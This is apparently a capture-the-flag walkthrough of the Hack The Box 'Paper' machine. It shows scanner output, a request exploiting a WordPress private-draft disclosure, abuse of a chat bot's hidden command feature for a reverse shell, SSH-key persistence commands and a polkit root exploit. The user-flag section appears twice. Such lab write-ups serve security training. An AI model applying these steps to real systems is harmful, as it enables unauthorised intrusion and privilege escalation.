User Flag

First, the server returns a weird header named x-backend-server with the value office.paper.

This could’ve been found using Burpsuite or simply the browser’s Devtools, but I noticed it when I used Nikto.

After adding office.paper to my /etc/hosts file, I took a look at the website. From the look and feel of it, I could already tell that it was probably a Wordpress website, but just to be sure, I looked at /wp-login, which confirmed me the website was indeed using Wordpress.

I then started wpscan to look for known vulnerabilities, either in Wordpress itself or in the plugins. For the API token, you can generate one for free at https://wpscan.com/register.

Apparently this WordPress version is vulnerable to CVE-2019-17671 which allows us to see a user’s private posts (https://wpscan.com/vulnerability/3413b879-785f-4c9f-aa8a-5a4a1d5e0ba2).

Indeed, we can see the user’s private posts which include a link to register to a chat for the employees.

After I logged into Rocket Chat, I saw a general conversation, which I took a look at.

the employees were chatting about a bot that reads files and lists directories for you.

So I wrote a private message to the bot and indeed it listed me the content of the current directory.

I tried the most obvious thing I could think of, and checked to see if I could read the content of the user’s ssh keys, but there were none. With no way to execute commands on the server, I couldn’t generate some either.

After looking around for a bit, I discovered the path ../hubot/scripts which contains the bot’s source code.

Looking at the content of the cmd.coffee script, it looks like the bot has a secret functionality that lets us execute code.

And when I tried it with cmd echo hello and the bot returned with hello. (There seemed to be a bug so the bot ran 2 times my commands, but I was too lazy to restart the machine)

I then ran a simple bash reverse shell.

And I caught the reverse shell using metasploit’s multi handler.

Root Flag

While I did have a reverse shell on the machine, I preferred to generate some private and public ssh keys for the user so that I could connect to the machine via ssh instead. That would make the job easier since our reverse shell would be much more stable and easier it would be easier to regain access in case our session terminates.

So first I generated the private and public ssh keys.

ssh-keygen -t rsa -N '' -f /home/dwight/.ssh/id_rsa

I then copied the value of the public key into authorized_keys to allow me to authenticate to the machine using the private ssh key.

cp /home/dwight/.ssh/id_rsa.pub /home/dwight/.ssh/authorized_keys

Finally, I copied the value of the private ssh key.

cat id_rsa

With all of that done, I could authenticate to the server using ssh.

┌─[✗]─[h3dg3h0g@parrotOS]─[~/Desktop/HackTheBox/Machines/EASY/Paper/ssh]
└──╼ $ssh dwight@paper.htb -i id_rsa 
Activate the web console with: systemctl enable --now cockpit.socket

Last login: Tue Feb  1 09:14:33 2022 from 10.10.14.23
[dwight@paper ~]$

For the privesc part, I like to use linpeas.sh for the discovery. I transferred it into the box by creating a python webserver on my machine and then downloading the file on the server using wget.

Right at the beginning of the script, linpeas.sh told me that the machine is probably vulnerable to CVE-2021-3560.

╔══════════╣ CVEs Check
Vulnerable to CVE-2021-3560

Finally, I found an exploit on exploit-db for this CVE (https://www.exploit-db.com/exploits/50011). I had to run it a couple of times for it to work, but I still ended up getting a root shell.

[root@paper hacked]# id
uid=0(root) gid=0(root) groups=0(root)

User Flag

First, the server returns a weird header named x-backend-server with the value office.paper.

This could’ve been found using Burpsuite or simply the browser’s Devtools, but I noticed it when I used Nikto.

┌─[h3dg3h0g@parrotOS]─[~/Desktop/HackTheBox/Machines/EASY/Paper]
└──╼ $nikto -host http://paper.htb
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          10.129.157.98
+ Target Hostname:    paper.htb
+ Target Port:        80
+ Start Time:         2022-02-14 16:34:11 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_fcgid/2.3.9
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ Uncommon header 'x-backend-server' found, with contents: office.paper
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Retrieved x-powered-by header: PHP/7.2.24
+ Allowed HTTP Methods: OPTIONS, HEAD, GET, POST, TRACE 
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-3092: /manual/: Web server manual found.
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3268: /manual/images/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ 8594 requests: 0 error(s) and 11 item(s) reported on remote host
+ End Time:           2022-02-14 16:38:41 (GMT-5) (270 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

I then started wpscan to look for known vulnerabilities, either in Wordpress itself or in the plugins. For the API token, you can generate one for free at https://wpscan.com/register.

┌─[h3dg3h0g@parrotOS]─[~/Desktop/HackTheBox/Machines/EASY/Paper]
└──╼ $wpscan --url http://office.paper --detection-mode aggressive --api-token ******************************** --enumerate ap,at --plugins-detection aggressive
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.17
                               
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[i] Updating the Database ...
[i] Update completed.

[+] URL: http://office.paper/ [10.129.157.98]
[+] Started: Mon Feb 14 16:58:49 2022

Interesting Finding(s):

[+] WordPress readme found: http://office.paper/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] WordPress version 5.2.3 identified (Insecure, released on 2019-09-05).
 | Found By: Atom Generator (Aggressive Detection)
 |  - http://office.paper/index.php/feed/atom/, <generator uri="https://wordpress.org/" version="5.2.3">WordPress</generator>
 | Confirmed By: Style Etag (Aggressive Detection)
 |  - http://office.paper/wp-admin/load-styles.php, Match: '5.2.3'
 |
 | [!] 31 vulnerabilities identified:
 |
 | [!] Title: WordPress <= 5.2.3 - Stored XSS in Customizer
 |     Fixed in: 5.2.4
 |     References:
 |      - https://wpscan.com/vulnerability/d39a7b84-28b9-4916-a2fc-6192ceb6fa56
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17674
 |      - https://wordpress.org/news/2019/10/wordpress-5-2-4-security-release/
 |      - https://blog.wpscan.com/wordpress/security/release/2019/10/15/wordpress-524-security-release-breakdown.html
 |
 | [!] Title: WordPress <= 5.2.3 - Unauthenticated View Private/Draft Posts
 |     Fixed in: 5.2.4
 |     References:
 |      - https://wpscan.com/vulnerability/3413b879-785f-4c9f-aa8a-5a4a1d5e0ba2
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17671
 |      - https://wordpress.org/news/2019/10/wordpress-5-2-4-security-release/
 |      - https://blog.wpscan.com/wordpress/security/release/2019/10/15/wordpress-524-security-release-breakdown.html
 |      - https://github.com/WordPress/WordPress/commit/f82ed753cf00329a5e41f2cb6dc521085136f308
 |      - https://0day.work/proof-of-concept-for-wordpress-5-2-3-viewing-unauthenticated-posts/
 |
 | [!] Title: WordPress <= 5.2.3 - Stored XSS in Style Tags
 |     Fixed in: 5.2.4
 |     References:
 |      - https://wpscan.com/vulnerability/d005b1f8-749d-438a-8818-21fba45c6465
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17672
 |      - https://wordpress.org/news/2019/10/wordpress-5-2-4-security-release/
 |      - https://blog.wpscan.com/wordpress/security/release/2019/10/15/wordpress-524-security-release-breakdown.html
 |
 | [!] Title: WordPress <= 5.2.3 - JSON Request Cache Poisoning
 |     Fixed in: 5.2.4
 |     References:
 |      - https://wpscan.com/vulnerability/7804d8ed-457a-407e-83a7-345d3bbe07b2
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17673
 |      - https://wordpress.org/news/2019/10/wordpress-5-2-4-security-release/
 |      - https://github.com/WordPress/WordPress/commit/b224c251adfa16a5f84074a3c0886270c9df38de
 |      - https://blog.wpscan.com/wordpress/security/release/2019/10/15/wordpress-524-security-release-breakdown.html
 |
 | [!] Title: WordPress <= 5.2.3 - Server-Side Request Forgery (SSRF) in URL Validation 
 |     Fixed in: 5.2.4
 |     References:
 |      - https://wpscan.com/vulnerability/26a26de2-d598-405d-b00c-61f71cfacff6
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17669
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17670
 |      - https://wordpress.org/news/2019/10/wordpress-5-2-4-security-release/
 |      - https://github.com/WordPress/WordPress/commit/9db44754b9e4044690a6c32fd74b9d5fe26b07b2
 |      - https://blog.wpscan.com/wordpress/security/release/2019/10/15/wordpress-524-security-release-breakdown.html
 |
 | [!] Title: WordPress <= 5.2.3 - Admin Referrer Validation
 |     Fixed in: 5.2.4
 |     References:
 |      - https://wpscan.com/vulnerability/715c00e3-5302-44ad-b914-131c162c3f71
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17675
 |      - https://wordpress.org/news/2019/10/wordpress-5-2-4-security-release/
 |      - https://github.com/WordPress/WordPress/commit/b183fd1cca0b44a92f0264823dd9f22d2fd8b8d0
 |      - https://blog.wpscan.com/wordpress/security/release/2019/10/15/wordpress-524-security-release-breakdown.html
 |
 | [!] Title: WordPress <= 5.3 - Authenticated Improper Access Controls in REST API
 |     Fixed in: 5.2.5
 |     References:
 |      - https://wpscan.com/vulnerability/4a6de154-5fbd-4c80-acd3-8902ee431bd8
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-20043
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16788
 |      - https://wordpress.org/news/2019/12/wordpress-5-3-1-security-and-maintenance-release/
 |      - https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-g7rg-hchx-c2gw
 |
 | [!] Title: WordPress <= 5.3 - Authenticated Stored XSS via Crafted Links
 |     Fixed in: 5.2.5
 |     References:
 |      - https://wpscan.com/vulnerability/23553517-34e3-40a9-a406-f3ffbe9dd265
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-20042
 |      - https://wordpress.org/news/2019/12/wordpress-5-3-1-security-and-maintenance-release/
 |      - https://hackerone.com/reports/509930
 |      - https://github.com/WordPress/wordpress-develop/commit/1f7f3f1f59567e2504f0fbebd51ccf004b3ccb1d
 |      - https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-xvg2-m2f4-83m7
 |
 | [!] Title: WordPress <= 5.3 - Authenticated Stored XSS via Block Editor Content
 |     Fixed in: 5.2.5
 |     References:
 |      - https://wpscan.com/vulnerability/be794159-4486-4ae1-a5cc-5c190e5ddf5f
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16781
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16780
 |      - https://wordpress.org/news/2019/12/wordpress-5-3-1-security-and-maintenance-release/
 |      - https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-pg4x-64rh-3c9v
 |
 | [!] Title: WordPress <= 5.3 - wp_kses_bad_protocol() Colon Bypass
 |     Fixed in: 5.2.5
 |     References:
 |      - https://wpscan.com/vulnerability/8fac612b-95d2-477a-a7d6-e5ec0bb9ca52
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-20041
 |      - https://wordpress.org/news/2019/12/wordpress-5-3-1-security-and-maintenance-release/
 |      - https://github.com/WordPress/wordpress-develop/commit/b1975463dd995da19bb40d3fa0786498717e3c53
 |
 | [!] Title: WordPress < 5.4.1 - Password Reset Tokens Failed to Be Properly Invalidated
 |     Fixed in: 5.2.6
 |     References:
 |      - https://wpscan.com/vulnerability/7db191c0-d112-4f08-a419-a1cd81928c4e
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11027
 |      - https://wordpress.org/news/2020/04/wordpress-5-4-1/
 |      - https://core.trac.wordpress.org/changeset/47634/
 |      - https://www.wordfence.com/blog/2020/04/unpacking-the-7-vulnerabilities-fixed-in-todays-wordpress-5-4-1-security-update/
 |      - https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-ww7v-jg8c-q6jw
 |
 | [!] Title: WordPress < 5.4.1 - Unauthenticated Users View Private Posts
 |     Fixed in: 5.2.6
 |     References:
 |      - https://wpscan.com/vulnerability/d1e1ba25-98c9-4ae7-8027-9632fb825a56
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11028
 |      - https://wordpress.org/news/2020/04/wordpress-5-4-1/
 |      - https://core.trac.wordpress.org/changeset/47635/
 |      - https://www.wordfence.com/blog/2020/04/unpacking-the-7-vulnerabilities-fixed-in-todays-wordpress-5-4-1-security-update/
 |      - https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-xhx9-759f-6p2w
 |
 | [!] Title: WordPress < 5.4.1 - Authenticated Cross-Site Scripting (XSS) in Customizer
 |     Fixed in: 5.2.6
 |     References:
 |      - https://wpscan.com/vulnerability/4eee26bd-a27e-4509-a3a5-8019dd48e429
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11025
 |      - https://wordpress.org/news/2020/04/wordpress-5-4-1/
 |      - https://core.trac.wordpress.org/changeset/47633/
 |      - https://www.wordfence.com/blog/2020/04/unpacking-the-7-vulnerabilities-fixed-in-todays-wordpress-5-4-1-security-update/
 |      - https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-4mhg-j6fx-5g3c
 |
 | [!] Title: WordPress < 5.4.1 - Authenticated Cross-Site Scripting (XSS) in Search Block
 |     Fixed in: 5.2.6
 |     References:
 |      - https://wpscan.com/vulnerability/e4bda91b-067d-45e4-a8be-672ccf8b1a06
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11030
 |      - https://wordpress.org/news/2020/04/wordpress-5-4-1/
 |      - https://core.trac.wordpress.org/changeset/47636/
 |      - https://www.wordfence.com/blog/2020/04/unpacking-the-7-vulnerabilities-fixed-in-todays-wordpress-5-4-1-security-update/
 |      - https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-vccm-6gmc-qhjh
 |
 | [!] Title: WordPress < 5.4.1 - Cross-Site Scripting (XSS) in wp-object-cache
 |     Fixed in: 5.2.6
 |     References:
 |      - https://wpscan.com/vulnerability/e721d8b9-a38f-44ac-8520-b4a9ed6a5157
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11029
 |      - https://wordpress.org/news/2020/04/wordpress-5-4-1/
 |      - https://core.trac.wordpress.org/changeset/47637/
 |      - https://www.wordfence.com/blog/2020/04/unpacking-the-7-vulnerabilities-fixed-in-todays-wordpress-5-4-1-security-update/
 |      - https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-568w-8m88-8g2c
 |
 | [!] Title: WordPress < 5.4.1 - Authenticated Cross-Site Scripting (XSS) in File Uploads
 |     Fixed in: 5.2.6
 |     References:
 |      - https://wpscan.com/vulnerability/55438b63-5fc9-4812-afc4-2f1eff800d5f
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11026
 |      - https://wordpress.org/news/2020/04/wordpress-5-4-1/
 |      - https://core.trac.wordpress.org/changeset/47638/
 |      - https://www.wordfence.com/blog/2020/04/unpacking-the-7-vulnerabilities-fixed-in-todays-wordpress-5-4-1-security-update/
 |      - https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-3gw2-4656-pfr2
 |      - https://hackerone.com/reports/179695
 |
 | [!] Title: WordPress <= 5.2.3 - Hardening Bypass
 |     Fixed in: 5.2.4
 |     References:
 |      - https://wpscan.com/vulnerability/378d7df5-bce2-406a-86b2-ff79cd699920
 |      - https://blog.ripstech.com/2020/wordpress-hardening-bypass/
 |      - https://hackerone.com/reports/436928
 |      - https://wordpress.org/news/2019/11/wordpress-5-2-4-update/
 |
 | [!] Title: WordPress < 5.4.2 - Authenticated XSS in Block Editor
 |     Fixed in: 5.2.7
 |     References:
 |      - https://wpscan.com/vulnerability/831e4a94-239c-4061-b66e-f5ca0dbb84fa
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-4046
 |      - https://wordpress.org/news/2020/06/wordpress-5-4-2-security-and-maintenance-release/
 |      - https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-rpwf-hrh2-39jf
 |      - https://pentest.co.uk/labs/research/subtle-stored-xss-wordpress-core/
 |      - https://www.youtube.com/watch?v=tCh7Y8z8fb4
 |
 | [!] Title: WordPress < 5.4.2 - Authenticated XSS via Media Files
 |     Fixed in: 5.2.7
 |     References:
 |      - https://wpscan.com/vulnerability/741d07d1-2476-430a-b82f-e1228a9343a4
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-4047
 |      - https://wordpress.org/news/2020/06/wordpress-5-4-2-security-and-maintenance-release/
 |      - https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-8q2w-5m27-wm27
 |
 | [!] Title: WordPress < 5.4.2 - Open Redirection
 |     Fixed in: 5.2.7
 |     References:
 |      - https://wpscan.com/vulnerability/12855f02-432e-4484-af09-7d0fbf596909
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-4048
 |      - https://wordpress.org/news/2020/06/wordpress-5-4-2-security-and-maintenance-release/
 |      - https://github.com/WordPress/WordPress/commit/10e2a50c523cf0b9785555a688d7d36a40fbeccf
 |      - https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-q6pw-gvf4-5fj5
 |
 | [!] Title: WordPress < 5.4.2 - Authenticated Stored XSS via Theme Upload
 |     Fixed in: 5.2.7
 |     References:
 |      - https://wpscan.com/vulnerability/d8addb42-e70b-4439-b828-fd0697e5d9d4
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-4049
 |      - https://www.exploit-db.com/exploits/48770/
 |      - https://wordpress.org/news/2020/06/wordpress-5-4-2-security-and-maintenance-release/
 |      - https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-87h4-phjv-rm6p
 |      - https://hackerone.com/reports/406289
 |
 | [!] Title: WordPress < 5.4.2 - Misuse of set-screen-option Leading to Privilege Escalation
 |     Fixed in: 5.2.7
 |     References:
 |      - https://wpscan.com/vulnerability/b6f69ff1-4c11-48d2-b512-c65168988c45
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-4050
 |      - https://wordpress.org/news/2020/06/wordpress-5-4-2-security-and-maintenance-release/
 |      - https://github.com/WordPress/WordPress/commit/dda0ccdd18f6532481406cabede19ae2ed1f575d
 |      - https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-4vpv-fgg2-gcqc
 |
 | [!] Title: WordPress < 5.4.2 - Disclosure of Password-Protected Page/Post Comments
 |     Fixed in: 5.2.7
 |     References:
 |      - https://wpscan.com/vulnerability/eea6dbf5-e298-44a7-9b0d-f078ad4741f9
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-25286
 |      - https://wordpress.org/news/2020/06/wordpress-5-4-2-security-and-maintenance-release/
 |      - https://github.com/WordPress/WordPress/commit/c075eec24f2f3214ab0d0fb0120a23082e6b1122
 |
 | [!] Title: WordPress 4.7-5.7 - Authenticated Password Protected Pages Exposure
 |     Fixed in: 5.2.10
 |     References:
 |      - https://wpscan.com/vulnerability/6a3ec618-c79e-4b9c-9020-86b157458ac5
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-29450
 |      - https://wordpress.org/news/2021/04/wordpress-5-7-1-security-and-maintenance-release/
 |      - https://blog.wpscan.com/2021/04/15/wordpress-571-security-vulnerability-release.html
 |      - https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-pmmh-2f36-wvhq
 |      - https://core.trac.wordpress.org/changeset/50717/
 |      - https://www.youtube.com/watch?v=J2GXmxAdNWs
 |
 | [!] Title: WordPress 3.7 to 5.7.1 - Object Injection in PHPMailer
 |     Fixed in: 5.2.11
 |     References:
 |      - https://wpscan.com/vulnerability/4cd46653-4470-40ff-8aac-318bee2f998d
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-36326
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-19296
 |      - https://github.com/WordPress/WordPress/commit/267061c9595fedd321582d14c21ec9e7da2dcf62
 |      - https://wordpress.org/news/2021/05/wordpress-5-7-2-security-release/
 |      - https://github.com/PHPMailer/PHPMailer/commit/e2e07a355ee8ff36aba21d0242c5950c56e4c6f9
 |      - https://www.wordfence.com/blog/2021/05/wordpress-5-7-2-security-release-what-you-need-to-know/
 |      - https://www.youtube.com/watch?v=HaW15aMzBUM
 |
 | [!] Title: WordPress < 5.8.2 - Expired DST Root CA X3 Certificate
 |     Fixed in: 5.2.13
 |     References:
 |      - https://wpscan.com/vulnerability/cc23344a-5c91-414a-91e3-c46db614da8d
 |      - https://wordpress.org/news/2021/11/wordpress-5-8-2-security-and-maintenance-release/
 |      - https://core.trac.wordpress.org/ticket/54207
 |
 | [!] Title: WordPress < 5.8 - Plugin Confusion
 |     Fixed in: 5.8
 |     References:
 |      - https://wpscan.com/vulnerability/95e01006-84e4-4e95-b5d7-68ea7b5aa1a8
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44223
 |      - https://vavkamil.cz/2021/11/25/wordpress-plugin-confusion-update-can-get-you-pwned/
 |
 | [!] Title: WordPress < 5.8.3 - SQL Injection via WP_Query
 |     Fixed in: 5.2.14
 |     References:
 |      - https://wpscan.com/vulnerability/7f768bcf-ed33-4b22-b432-d1e7f95c1317
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21661
 |      - https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-6676-cqfm-gw84
 |      - https://hackerone.com/reports/1378209
 |
 | [!] Title: WordPress < 5.8.3 - Author+ Stored XSS via Post Slugs
 |     Fixed in: 5.2.14
 |     References:
 |      - https://wpscan.com/vulnerability/dc6f04c2-7bf2-4a07-92b5-dd197e4d94c8
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21662
 |      - https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-699q-3hj9-889w
 |      - https://hackerone.com/reports/425342
 |      - https://blog.sonarsource.com/wordpress-stored-xss-vulnerability
 |
 | [!] Title: WordPress 4.1-5.8.2 - SQL Injection via WP_Meta_Query
 |     Fixed in: 5.2.14
 |     References:
 |      - https://wpscan.com/vulnerability/24462ac4-7959-4575-97aa-a6dcceeae722
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21664
 |      - https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-jp3p-gw8h-6x86
 |
 | [!] Title: WordPress < 5.8.3 - Super Admin Object Injection in Multisites
 |     Fixed in: 5.2.14
 |     References:
 |      - https://wpscan.com/vulnerability/008c21ab-3d7e-4d97-b6c3-db9d83f390a7
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21663
 |      - https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-jmmq-m8p8-332h
 |      - https://hackerone.com/reports/541469

[i] The main theme could not be detected.

[+] Enumerating All Plugins (via Aggressive Methods)
 Checking Known Locations - Time: 00:09:51 <=======================================================================================================================================================> (96872 / 96872) 100.00% Time: 00:09:51
[+] Checking Plugin Versions (via Passive and Aggressive Methods)

[i] Plugin(s) Identified:

[+] stops-core-theme-and-plugin-updates
 | Location: http://office.paper/wp-content/plugins/stops-core-theme-and-plugin-updates/
 | Last Updated: 2022-01-05T11:34:00.000Z
 | Readme: http://office.paper/wp-content/plugins/stops-core-theme-and-plugin-updates/readme.txt
 | [!] The version is out of date, the latest version is 9.0.12
 |
 | Found By: Known Locations (Aggressive Detection)
 |  - http://office.paper/wp-content/plugins/stops-core-theme-and-plugin-updates/, status: 200
 |
 | Version: 9.0.9 (100% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - http://office.paper/wp-content/plugins/stops-core-theme-and-plugin-updates/readme.txt
 | Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
 |  - http://office.paper/wp-content/plugins/stops-core-theme-and-plugin-updates/readme.txt

[+] Enumerating All Themes (via Aggressive Methods)
 Checking Known Locations - Time: 00:02:22 <=======================================================================================================================================================> (23652 / 23652) 100.00% Time: 00:02:22
[+] Checking Theme Versions (via Aggressive Methods)

[i] Theme(s) Identified:

[+] construction-techup
 | Location: http://office.paper/wp-content/themes/construction-techup/
 | Latest Version: 1.4
 | Last Updated: 2021-07-17T00:00:00.000Z
 | Readme: http://office.paper/wp-content/themes/construction-techup/readme.txt
 | Style URL: http://office.paper/wp-content/themes/construction-techup/style.css
 | Style Name: Construction Techup
 | Description: Construction Techup is child theme of Techup a Free WordPress Theme useful for Business, corporate a...
 | Author: wptexture
 | Author URI: https://testerwp.com/
 |
 | Found By: Known Locations (Aggressive Detection)
 |  - http://office.paper/wp-content/themes/construction-techup/, status: 403
 |
 | The version could not be determined.

[+] techup
 | Location: http://office.paper/wp-content/themes/techup/
 | Latest Version: 1.34
 | Last Updated: 2022-01-15T00:00:00.000Z
 | Readme: http://office.paper/wp-content/themes/techup/readme.txt
 | Style URL: http://office.paper/wp-content/themes/techup/style.css
 | Style Name: Techup
 | Style URI: https://testerwp.com/techup-free-theme/
 | Description: Techup is a Free WordPress Theme useful for Business, corporate and agency  and Finance Institutiona...
 | Author: wptexture
 | Author URI: https://testerwp.com/
 |
 | Found By: Known Locations (Aggressive Detection)
 |  - http://office.paper/wp-content/themes/techup/, status: 500
 |
 | The version could not be determined.

[+] twentynineteen
 | Location: http://office.paper/wp-content/themes/twentynineteen/
 | Latest Version: 2.2
 | Last Updated: 2022-01-25T00:00:00.000Z
 | Readme: http://office.paper/wp-content/themes/twentynineteen/readme.txt
 | Style URL: http://office.paper/wp-content/themes/twentynineteen/style.css
 | Style Name: Twenty Nineteen
 | Style URI: https://wordpress.org/themes/twentynineteen/
 | Description: Our 2019 default theme is designed to show off the power of the block editor. It features custom sty...
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 |
 | Found By: Known Locations (Aggressive Detection)
 |  - http://office.paper/wp-content/themes/twentynineteen/, status: 500
 |
 | The version could not be determined.

[+] twentyseventeen
 | Location: http://office.paper/wp-content/themes/twentyseventeen/
 | Latest Version: 2.9
 | Last Updated: 2022-01-25T00:00:00.000Z
 | Readme: http://office.paper/wp-content/themes/twentyseventeen/README.txt
 | Style URL: http://office.paper/wp-content/themes/twentyseventeen/style.css
 | Style Name: Twenty Seventeen
 | Style URI: https://wordpress.org/themes/twentyseventeen/
 | Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo...
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 |
 | Found By: Known Locations (Aggressive Detection)
 |  - http://office.paper/wp-content/themes/twentyseventeen/, status: 500
 |
 | The version could not be determined.

[+] twentysixteen
 | Location: http://office.paper/wp-content/themes/twentysixteen/
 | Latest Version: 2.6
 | Last Updated: 2022-01-25T00:00:00.000Z
 | Readme: http://office.paper/wp-content/themes/twentysixteen/readme.txt
 | Style URL: http://office.paper/wp-content/themes/twentysixteen/style.css
 | Style Name: Twenty Sixteen
 | Style URI: https://wordpress.org/themes/twentysixteen/
 | Description: Twenty Sixteen is a modernized take on an ever-popular WordPress layout — the horizontal masthead ...
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 |
 | Found By: Known Locations (Aggressive Detection)
 |  - http://office.paper/wp-content/themes/twentysixteen/, status: 500
 |
 | The version could not be determined.

[+] WPScan DB API OK
 | Plan: free
 | Requests Done (during the scan): 7
 | Requests Remaining: 18

[+] Finished: Mon Feb 14 17:11:23 2022
[+] Requests Done: 120607
[+] Cached Requests: 9
[+] Data Sent: 31.568 MB
[+] Data Received: 41.684 MB
[+] Memory used: 392.992 MB
[+] Elapsed time: 00:12:33

Apparently this WordPress version is vulnerable to CVE-2019-17671 which allows us to see a user’s private posts (https://wpscan.com/vulnerability/3413b879-785f-4c9f-aa8a-5a4a1d5e0ba2).

GET /?static=1 HTTP/1.1
Host: office.paper
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://office.paper/wp-login.php?action=lostpassword
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: wordpress_test_cookie=WP+Cookie+check
Connection: close

Indeed, we can see the user’s private posts which include a link to register to a chat for the employees.

HTTP/1.1 200 OK
Date: Mon, 09 May 2022 04:29:12 GMT
Server: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_fcgid/2.3.9
X-Powered-By: PHP/7.2.24
Link: <http://office.paper/index.php/wp-json/>; rel="https://api.w.org/", <http://office.paper/?p=108>; rel=shortlink
X-Backend-Server: office.paper
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 22184


<!doctype html>
<html lang="en-US">

[...]

<div id="post-86" class="post-86 page type-page status-draft hentry">
	<div class="blog-detail">
				 	
<p># Secret Registration URL of new Employee chat system</p>



<p>http://chat.office.paper/register/8qozr226AhkCHZdyY</p>



<p># I am keeping this draft unpublished, as unpublished drafts cannot be accessed by outsiders. I am not that ignorant, Nick.</p>



<p># Also, stop looking at my drafts. Jeez!</p>
	
				 
	</div>
</div>

[...]

After I logged into Rocket Chat, I saw a general conversation, which I took a look at.

the employees were chatting about a bot that reads files and lists directories for you.

So I wrote a private message to the bot and indeed it listed me the content of the current directory.

After looking around for a bit, I discovered the path ../hubot/scripts which contains the bot’s source code.

Looking at the content of the cmd.coffee script, it looks like the bot has a secret functionality that lets us execute code.

And when I tried it with cmd echo hello and the bot returned with hello. (There seemed to be a bug so the bot ran 2 times my commands, but I was too lazy to restart the machine)

I then ran a simple bash reverse shell.

And I caught the reverse shell using metasploit’s multi handler.

